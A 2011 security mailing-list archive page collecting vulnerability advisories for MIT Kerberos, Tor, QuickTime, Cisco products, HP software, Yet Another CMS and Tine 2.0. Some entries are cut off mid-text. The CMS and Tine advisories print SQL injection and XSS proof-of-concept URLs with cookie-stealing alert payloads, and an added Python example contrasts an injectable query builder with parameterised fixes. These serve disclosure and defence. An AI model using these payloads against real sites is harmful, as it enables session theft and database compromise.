MITKRB5-SA-2011-006 KDC denial of service vulnerabilities [CVE-2011-1527 CVE-2011-1528 CVE-2011-1529]

2011-10-20 Thread Tom Yu

MITKRB5-SA-2011-006

MIT krb5 Security Advisory 2011-006
Original release: 2011-10-18
Last update: 2011-10-18

Topic: KDC denial of service vulnerabilities

CVE-2011-1527: null pointer dereference in KDC LDAP back end

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:H/RL:OF/RC:C

CVSSv2 Base Score:  7.8

Access Vector:          Network
Access Complexity:      Low
Authentication:         None
Confidentiality Impact: None
Integrity Impact:       None
Availability Impact:    Complete

CVSSv2 Temporal Score:  6.8

Exploitability: High
Remediation Level:  Official Fix
Report Confidence:  Confirmed

CVE-2011-1528: assertion failure in multiple KDC back ends

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C
CVSSv2 Base Score:  7.8
CVSSv2 Temporal Score:  6.1

CVE-2011-1529: null pointer dereference in multiple KDC back ends

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C
CVSSv2 Base Score:  7.8
CVSSv2 Temporal Score:  6.1

SUMMARY
=======

CVE-2011-1527: In releases krb5-1.9 and later, the KDC can crash due
to a null pointer dereference if configured to use the LDAP back end.
A trigger condition is publicly known but not known to be widely
circulated.

CVE-2011-1528: In releases krb5-1.8 and later, the KDC can crash due
to an assertion failure.  No exploit is known to exist, but there is
public evidence that the unidentified trigger condition occurs in the
field.

CVE-2011-1529: In releases krb5-1.8 and later, the KDC can crash due
to a null pointer dereference.  No exploit is known to exist.

IMPACT
======

CVE-2011-1527: An unauthenticated remote attacker can crash a KDC
daemon via null pointer dereference if the KDC is configured to use
the LDAP back end.  (This is not the default configuration.)

CVE-2011-1528: An unauthenticated remote attacker can crash a KDC
daemon via assertion failure.

CVE-2011-1529: An unauthenticated remote attacker can crash a KDC
daemon via null pointer dereference.

AFFECTED SOFTWARE
=================

* The KDC in krb5-1.9 and later is vulnerable to CVE-2011-1527 when
  configured with the LDAP back end.  Earlier releases had different
  code that masked this bug and did not crash under these conditions.

* The KDC in krb5-1.8 and later is vulnerable to CVE-2011-1528 when
  configured with the LDAP back end.  When configured with the
  Berkeley DB (db2) back end, only releases krb5-1.8 through
  krb5-1.8.4 are vulnerable.

* The KDC in krb5-1.8 and later is vulnerable to CVE-2011-1529 when
  configured with either the Berkeley DB (db2) or the LDAP back end.

FIXES
=====

* Workaround: restart the KDC when it crashes, possibly using an
  automated monitoring process.

* An upcoming release in the krb5-1.9.x series will fix CVE-2011-1527.

* Upcoming releases in the krb5-1.8.x and krb5-1.9.x series will fix
  CVE-2011-1528 and CVE-2011-1529.

* The patch for krb5-1.9.x is available at

  http://web.mit.edu/kerberos/advisories/2011-006-patch.txt

  A PGP-signed patch is available at

  http://web.mit.edu/kerberos/advisories/2011-006-patch.txt.asc


* The patch for krb5-1.8.x is available at

  http://web.mit.edu/kerberos/advisories/2011-006-patch-r18.txt

  A PGP-signed patch is available at

  http://web.mit.edu/kerberos/advisories/2011-006-patch-r18.txt.asc

REFERENCES
==========

This announcement is posted at:

  http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-006.txt

This announcement and related security advisories may be found on the
MIT Kerberos security advisory page at:

http://web.mit.edu/kerberos/advisories/index.html

The main MIT Kerberos web page is at:

http://web.mit.edu/kerberos/index.html

CVSSv2:

http://www.first.org/cvss/cvss-guide.html
http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

CVE: CVE-2011-1527
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1527

CVE: CVE-2011-1528
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1528

CVE: CVE-2011-1529
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1529

Debian bug #629558:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=629558

Ubuntu bug #715579:
https://bugs.launchpad.net/ubuntu/+source/krb5/+bug/715579

ACKNOWLEDGMENTS
===============

CVE-2011-1527: Nalin Dahyabhai and Andrej Ota independently reported
this vulnerability.  Kyle Moffett independently reported this bug to
Debian.

CVE-2011-1528: Mark Deneen reported this vulnerability to Ubuntu.

CONTACT
=======

The MIT Kerberos Team security contact address is
krbcore-secur...@mit.edu.  When sending sensitive information,
please PGP-encrypt it using the following key:

pub   2048R/56CD8F76 2010-12-29 [expires: 2012-02-01]
uid MIT Kerberos Team Security Contact krbcore-secur...@mit.edu

DETAILS
=======

CVE-2011-1527: null pointer dereference in KDC LDAP back end

Under certain error conditions, krb5_ldap_get_principal() in the KDC
LDAP back end can return success yet leave the client principal entry
as a null 

[ GLSA 201110-13 ] Tor: Multiple vulnerabilities

2011-10-20 Thread Tim Sammut
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201110-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
    Title: Tor: Multiple vulnerabilities
     Date: October 18, 2011
     Bugs: #351920, #359789
       ID: 201110-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities were found in Tor, the most severe of which
may allow a remote attacker to execute arbitrary code.

Background
==========

Tor is an implementation of second generation Onion Routing, a
connection-oriented anonymizing communication service.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  net-misc/tor               < 0.2.1.30                 >= 0.2.1.30

Description
===========

Multiple vulnerabilities have been discovered in Tor. Please review the
CVE identifiers referenced below for details.

Impact
======

A remote unauthenticated attacker may be able to execute arbitrary code
with the privileges of the Tor process or create a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Tor users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose =net-misc/tor-0.2.1.30

NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since April 2, 2011. It is likely that your system is already
no longer affected by this issue.

References
==========

[ 1 ] CVE-2011-0015
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0015
[ 2 ] CVE-2011-0016
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0016
[ 3 ] CVE-2011-0427
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0427
[ 4 ] CVE-2011-0490
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0490
[ 5 ] CVE-2011-0491
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0491
[ 6 ] CVE-2011-0492
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0492
[ 7 ] CVE-2011-0493
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0493
[ 8 ] CVE-2011-1924
  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1924

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-201110-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5





ZDI-11-295 : Apple QuickTime FlashPix JPEG Tables Selector Remote Code Execution Vulnerability

2011-10-20 Thread ZDI Disclosures
ZDI-11-295 : Apple QuickTime FlashPix JPEG Tables Selector Remote Code
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-295
October 18, 2011

-- CVE ID:
CVE-2011-3222

-- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple Quicktime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Quicktime handles flashpix
files. When a flashpix contains a tile that has a Compression Type 0x2
(JPEG) and a 'JPEG tables selector' value that is bigger than the
global stream property 'Maximum JPEG table index', Quicktime will write
outside the global JPEG table. This corruption could lead to remote code
execution under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details
can be found at:

http://support.apple.com/kb/HT5002
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-18 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi





Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities

2011-10-20 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities

Advisory ID: cisco-sa-20111019-sns

Revision 1.0

For Public Release 2011 October 19 16:00  UTC (GMT)

+--------------------------------------------------------------------

Summary
=======

The Cisco Show and Share webcasting and video sharing application
contains two vulnerabilities.

The first vulnerability allows an unauthenticated user to access
several administrative web pages.

The second vulnerability permits an authenticated user to execute
arbitrary code on the device under the privileges of the web server
user account.

Cisco has released free software updates that address these
vulnerabilities.

There are no workarounds available for these vulnerabilities.

This advisory is posted at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111019-sns

Note: Effective October 18, 2011, Cisco moved the current list of
Cisco Security Advisories and Responses published by Cisco PSIRT. The
new location is:
http://tools.cisco.com/security/center/publicationListing
You can also navigate to this page from the Cisco Products and Services
menu of the Cisco Security Intelligence Operations (SIO) Portal.
Following this transition, new Cisco Security Advisories and Responses
will be published to the new location. Although the URL has changed,
the content of security documents and the vulnerability policy are not
impacted. Cisco will continue to disclose security vulnerabilities in
accordance with the published Security Vulnerability Policy.

Affected Products
=================

Vulnerable Products
+------------------

These vulnerabilities affect all versions of Cisco Show and Share
prior to the first fixed releases as indicated in the Software
Version and Fixes section of this Cisco Security Advisory.

To determine the Cisco Show and Share Software release that an
appliance is running, administrators can log in to the Appliance
Administrative Interface (AAI), and access the main menu. The
software version is identified next to the Cisco Show and Share
field. The following example identifies a Cisco Show and Share
appliance running version 5.2.2.

 Cisco Show and Share Application Administration Interface
 Main Menu
   IP: 192.168.0.1

   Cisco Show and Share 5.2.2
   http://sns.example.com/vportal



SHOW_INFO   Show system information.
BACKUP_AND_RESTORE  Back up and restore.
APPLIANCE_CONTROL   Configure advance options
NETWORK_SETTINGSConfigure network parameters.
DATE_TIME_SETTINGS  Configure date and time
CERTIFICATE_MANAGEMENT  Manage all certificates in the system




 OK  LOG OUT


Products Confirmed Not Vulnerable
+--------------------------------

The following products are confirmed not vulnerable:

  * Cisco Video Portal

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
=======

Cisco Show and Share is a webcasting and video sharing application
that helps organizations create secure video communities to share
ideas and expertise, optimize global video collaboration, and
personalize the connection between customers, employees, and students
with user-generated content.

Cisco Show and Share provides the ability to create live and
on-demand video content, and define who can watch specific content.
It offers viewer collaboration tools such as commenting, rating, and
word tagging, and provides comprehensive access reporting.

Cisco Show and Share contains the following vulnerabilities:

  * Anonymous users can access some administration pages

    Several administrative web pages of the Cisco Show and Share can
    be accessed without prior user authentication. These include
    pages for accessing Encoders and Pull Configurations, Push
    Configurations, Video Encoding Formats, and Transcoding.

    This vulnerability is documented in Cisco Bug ID CSCto73758, and has
    been assigned CVE identifier CVE-2011-2584.

  * Cisco Show and Share arbitrary code execution vulnerability

    An authenticated user with privileges to upload videos could
    upload code that could then be executed under the privileges of
    the web server.

    Note: The web server runs as a non-root user.  Details regarding
    the impact of accessing each one of these administrative pages
    are included in the Impact section of this Cisco Security
    Advisory.

    This vulnerability is documented in Cisco Bug ID CSCto69857, and has
    been assigned CVE identifier CVE-2011-2585.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS

Cisco Security Advisory: CiscoWorks Common Services Arbitrary Command Execution Vulnerability

2011-10-20 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: CiscoWorks Common Services Arbitrary Command
Execution Vulnerability

Advisory ID: cisco-sa-20111019-cs

Revision 1.0

For Public Release 2011 October 19 16:00  UTC (GMT)

+--------------------------------------------------------------------

Summary
=======

CiscoWorks Common Services for Microsoft Windows contains a
vulnerability that could allow an authenticated, remote attacker to
execute arbitrary commands on the affected system with the privileges
of a system administrator.

Cisco has released free software updates that address this
vulnerability.

There are no workarounds that mitigate this vulnerability.

This advisory is posted at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111019-cs

Note: Effective October 18, 2011, Cisco moved the current list of
Cisco Security Advisories and Responses published by Cisco PSIRT. The
new location is:
http://tools.cisco.com/security/center/publicationListing
You can also navigate to this page from the Cisco
Products and Services menu of the Cisco Security Intelligence
Operations (SIO) Portal. Following this transition, new Cisco Security
Advisories and Responses will be published to the new location.
Although the URL has changed, the content of security documents and
the vulnerability policy are not impacted. Cisco will continue to
disclose security vulnerabilities in accordance with the published
Security Vulnerability Policy.

Affected Products
=================

Vulnerable Products
+------------------

This vulnerability affects all versions of CiscoWorks Common
Services-based products running on Microsoft Windows.

Common Services version 4.1 and later are not affected by this
vulnerability.

The following CiscoWorks products with the default Common Services
installed are affected by this vulnerability, due to their underlying
Common Services version:

  * CiscoWorks LAN Management Solution

+------------------------------------+--------------------------+
| LAN Management Solution Versions   | Common Services Versions |
|------------------------------------+--------------------------|
| Prior to 3.2 on Microsoft Windows  | Various                  |
|------------------------------------+--------------------------|
| 3.2 on Microsoft Windows           | 3.3                      |
|------------------------------------+--------------------------|
| 3.2.1 on Microsoft Windows         | 3.3.1                    |
|------------------------------------+--------------------------|
| 4.0 on Microsoft Windows           | 4.0                      |
|------------------------------------+--------------------------|
| 4.0.1 on Microsoft Windows         | 4.0.1                    |
+------------------------------------+--------------------------+

Note: CiscoWorks LAN Management Solution versions prior to 3.2
reached end of software maintenance. Customers should contact
their Cisco support team for assistance in upgrading to a
supported version of CiscoWorks LAN Management Solution.

  * Cisco Security Manager

+-----------------------------------------+---------------------+
|        Security Manager Versions        |   Common Services   |
|                                         |      Versions       |
|-----------------------------------------+---------------------|
| Prior to 3.2                            | Various             |
|-----------------------------------------+---------------------|
| 3.2, 3.2 SP1, 3.2 SP2                   | 3.1                 |
|-----------------------------------------+---------------------|
| 3.2.1, 3.2.1 SP1                        | 3.1.1               |
|-----------------------------------------+---------------------|
| 3.2.2, 3.2.2 SP1, 3.2.2 SP2, 3.2.2 SP3, | 3.2                 |
| 3.2.2 SP4                               |                     |
|-----------------------------------------+---------------------|
| 3.3, 3.3 SP1, 3.3 SP2                   | 3.2                 |
|-----------------------------------------+---------------------|
| 3.3.1, 3.3.1 SP1, 3.3.1 SP2, 3.3.1 SP3  | 3.2                 |
|-----------------------------------------+---------------------|
| 4.0, 4.0 SP1                            | 3.3                 |
|-----------------------------------------+---------------------|
| 4.0.1, 4.0.1 SP1                        | 3.3                 |
|-----------------------------------------+---------------------|
| 4.1                                     | 3.3                 |
+-----------------------------------------+---------------------+

Note: Cisco Security Manager versions prior to 3.2 reached end of
software maintenance. Customers should contact their Cisco
support team for assistance in upgrading to a supported version
of 

Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities

2011-10-20 Thread sschurtz
Advisory:           Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
Advisory ID:SSCHADV2011-031
Author: Stefan Schurtz
Affected Software:  Successfully tested on Yet Another CMS 1.0
Vendor URL: http://yetanothercms.codeplex.com/
Vendor Status:  informed
EDB-ID: 17997

==========================
Vulnerability Description:
==========================

Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities

==================
Technical Details:
==================

// search.php
$result_set = get_search_result_set($_POST['pattern']);

// includes/functions.php
function get_search_result_set($pattern, $public = true) {
  global $connection;
  $query = "SELECT
              id,
              subject_id,
              menu_name,
              position,
              visible,
              content,
              CONCAT('... ', SUBSTRING(content, LOCATE('" . $pattern . "',content), 200), ' ...') as fragment
            FROM
              pages
            WHERE
              content like '%" . $pattern . "%'";

// index.php
<?php find_selected_page(); ?>

// includes/functions.php
function find_selected_page() {
  global $sel_subject;
  global $sel_page;
  if (isset($_GET['subj'])) {
    $sel_subject = get_subject_by_id($_GET['subj']);
    $sel_page = get_default_page($sel_subject['id']);
  } elseif (isset($_GET['page'])) {
    $sel_subject = NULL;
    $sel_page = get_page_by_id($_GET['page']);
  } else {
    $sel_subject = NULL;
    $sel_page = NULL;
  }
}

function get_page_by_id($page_id) {
  global $connection;
  $query = "SELECT * ";
  $query .= "FROM pages ";
  $query .= "WHERE id=" . $page_id . " ";
  $query .= "LIMIT 1";

=======
Exploit
=======

SQL Injection

http://target/index.php?page=[sql injection]
http://target/search.php - 'search field' - [sql injection]

XSS

http://target/search.php - 'search field' - 
'/scriptscriptalert(document.cookie)/script
http://target/index.php?page='/scriptscriptalert(document.cookie)/script

=========
Solution:
=========

-


====================
Disclosure Timeline:
====================

18-Oct-2011 - informed developers
19-Oct-2011 - release date of this security advisory


========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:
===========

http://yetanothercms.codeplex.com/
http://yetanothercms.codeplex.com/workitem/643
http://www.rul3z.de/advisories/SSCHADV2011-031.txt
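Example added here, not part of the advisory or of Yet Another CMS: the get_page_by_id() and get_search_result_set() queries shown above rebuilt with bound parameters, run with Python's sqlite3 against a constructed "pages" table. The column set comes from the advisory's SELECT; the $public flag is assumed to mean "visible pages only", and SQLite's instr()/substr() stand in for MySQL's LOCATE()/SUBSTRING().

```python
import sqlite3

# Constructed sample rows standing in for the CMS "pages" table (not from the advisory).
SAMPLE_PAGES = [
    (1, 1, "Home", 1, 1, "Welcome to the site"),
    (2, 1, "Pricing", 2, 1, "Save 50% on annual plans"),
    (3, 2, "Staff", 1, 0, "Internal staff directory"),
]


def make_connection():
    """In-memory SQLite database with the columns the CMS query selects."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, subject_id INTEGER, "
        "menu_name TEXT, position INTEGER, visible INTEGER, content TEXT)"
    )
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_PAGES)
    return conn


def build_query_unsafe(page_id):
    """Same construction as the CMS's get_page_by_id(): the request value is pasted
    into the SQL text, so whatever the client sends becomes part of the statement.
    Kept only to show what ends up in the query; never executed here."""
    return "SELECT * FROM pages WHERE id=" + page_id + " LIMIT 1"


def is_valid_page_id(page_id):
    """Allow-list check: a page id is a non-empty string of ASCII digits."""
    return isinstance(page_id, str) and page_id.isdigit()


def get_page_by_id_safe(conn, page_id):
    """Hardened lookup: validate the shape of the value, then bind it as a
    parameter so the database never parses it as SQL."""
    if not is_valid_page_id(page_id):
        raise ValueError("page id must be a non-negative integer string")
    cur = conn.execute("SELECT * FROM pages WHERE id = ? LIMIT 1", (int(page_id),))
    return cur.fetchone()


def _escape_like(pattern):
    # Binding alone does not neutralise LIKE wildcards: a user-supplied '%' or '_'
    # would still widen the match. Escape them and declare the escape char via ESCAPE.
    return pattern.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_pages_safe(conn, pattern, public=True):
    """Hardened equivalent of get_search_result_set(): the pattern is bound twice
    (once for the fragment, once for the LIKE filter) instead of being concatenated.
    The public flag is assumed to restrict results to visible pages."""
    like = "%" + _escape_like(pattern) + "%"
    sql = (
        "SELECT id, subject_id, menu_name, position, visible, content, "
        "'... ' || substr(content, instr(content, ?), 200) || ' ...' AS fragment "
        "FROM pages WHERE content LIKE ? ESCAPE '\\'"
    )
    if public:
        sql += " AND visible = 1"
    return conn.execute(sql, (pattern, like)).fetchall()
```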


[security bulletin] HPSBPI02711 SSRT100647 rev.1 - HP MFP Digital Sending Software Running on Windows, Local Information Disclosure

2011-10-20 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03052686
Version: 1

HPSBPI02711 SSRT100647 rev.1 - HP MFP Digital Sending Software Running on 
Windows, Local Information Disclosure

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2011-10-19
Last Updated: 2011-10-19

Potential Security Impact: Local information disclosure

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP MFP Digital 
Sending Software running on Windows. The vulnerability could result in 
disclosure of personal information contained in workflow metadata to unintended 
recipients.

References: CVE-2011-3163

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP MFP Digital Sending Software v4.91.21 and all previous 4.9x versions

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2011-3163    (AV:L/AC:H/Au:N/C:P/I:N/A:N)       1.2
===========================================================
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided HP MFP Digital Sending Software v4.20 to resolve the 
vulnerability.

HP MFP Digital Sending Software v4.20 can be downloaded from 
http://www.hp.com/go/dss

Note: Select DSS 4 free 60-day demo.

HISTORY
Version:1 (rev.1) - 19 October 2011 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental,special 
or consequential damages including downtime cost; lost profits;damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company in the 
United States and other countries. Other product and company names mentioned 
herein may be trademarks of their respective owners.


Multiple vulnerabilities in Tine 2.0

2011-10-20 Thread advisory
Vulnerability ID: HTB23050
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_tine_2_0.html
Product: Tine 2.0
Vendor: Metaways Infosystems GmbH ( http://www.tine20.org )
Vulnerable Version: Maischa (2011/05) and probably prior
Tested Version: Maischa (2011/05)
Vendor Notification: 28 September 2011
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple 
vulnerabilities in Tine 2.0, which can be exploited to perform cross-site 
scripting attacks.

1) Input passed via the lang GET parameter to 
/library/idnaconvert/example.php is not properly sanitised before being 
returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's 
browser session in context of affected website.

The following PoC code is available:

http://[host]/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) Input appended to the URL after /library/idnaconvert/example.php is not
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.

The following PoC is available:

http://[host]/library/idnaconvert/example.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Successful exploitation of the vulnerabilities requires that Apache's directive
AcceptPathInfo is set to on or default (default value is default).

3) Input appended to the URL after
/library/phpexcel/phpexcel/shared/jama/docs/download.php is not properly
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.

The following PoC is available:

http://[host]/library/phpexcel/phpexcel/shared/jama/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Successful exploitation of the vulnerabilities requires that Apache's directive
AcceptPathInfo is set to on or default (default value is default).

Solution: Upgrade to the most recent version
Disclaimer: Details of this Advisory may be updated in order to provide as 
accurate information as possible. The latest version of the Advisory is 
available on the web page in Reference field.



[security bulletin] HPSBMU02716 SSRT100651 rev.1 - HP Data Protector Notebook Extension, Remote Execution of Arbitrary Code

2011-10-20 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03058866
Version: 1
HPSBMU02716 SSRT100651 rev.1 - HP Data Protector Notebook Extension, Remote 
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2011-10-18
Last Updated: 2011-10-18

Potential Security Impact: Remote execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Data Protector
Notebook Extension. These vulnerabilities could be remotely exploited to allow
execution of arbitrary code.
References: CVE-2011-3156 (ZDI-CAN-1222), CVE-2011-3157 (ZDI-CAN-1225), 
CVE-2011-3158 (ZDI-CAN-1226), CVE-2011-3159 (ZDI-CAN-1227), CVE-2011-3160 
(ZDI-CAN-1228), CVE-2011-3161 (ZDI-CAN-1229), CVE-2011-3162 (ZDI-CAN-1296).
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Data Protector Notebook Extension version 6.20, running on Windows platform 
(2000, 2003, XP, 2008, Vista, Win7).
HP Data Protector for Personal Computers version 7.0, running on Windows 
platform (2000, 2003, XP, 2008, Vista, Win7).
BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-3156(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3157(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3158(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3159(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3160(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3161(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
CVE-2011-3162(AV:N/AC:L/Au:N/C:C/I:C/A:C)10
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod along with
TippingPoint's Zero Day Initiative for reporting these vulnerabilities to
security-al...@hp.com.
RESOLUTION

HP has provided the following patch to resolve this vulnerability.
The patch can be retrieved from http://support.openview.hp.com/selfsolve/patches

For HP Data Protector Notebook Extension v6.20
Operating System Platform                        Patch ID
Windows (2000, 2003, XP, 2008, Vista, Win 7)     DPPCWIN_1

For HP Data Protector for Personal Computers v7.0
Operating System Platform                        Patch ID
Windows (2000, 2003, XP, 2008, Vista, Win 7)     DPPCWIN_1

HISTORY
Version: 1 (rev.1) - 18 October 2011 Initial release
Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental,special 
or consequential damages including downtime cost; lost profits;damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company in the 
United States and other countries. Other product and company names mentioned 
herein may be trademarks of their respective owners.


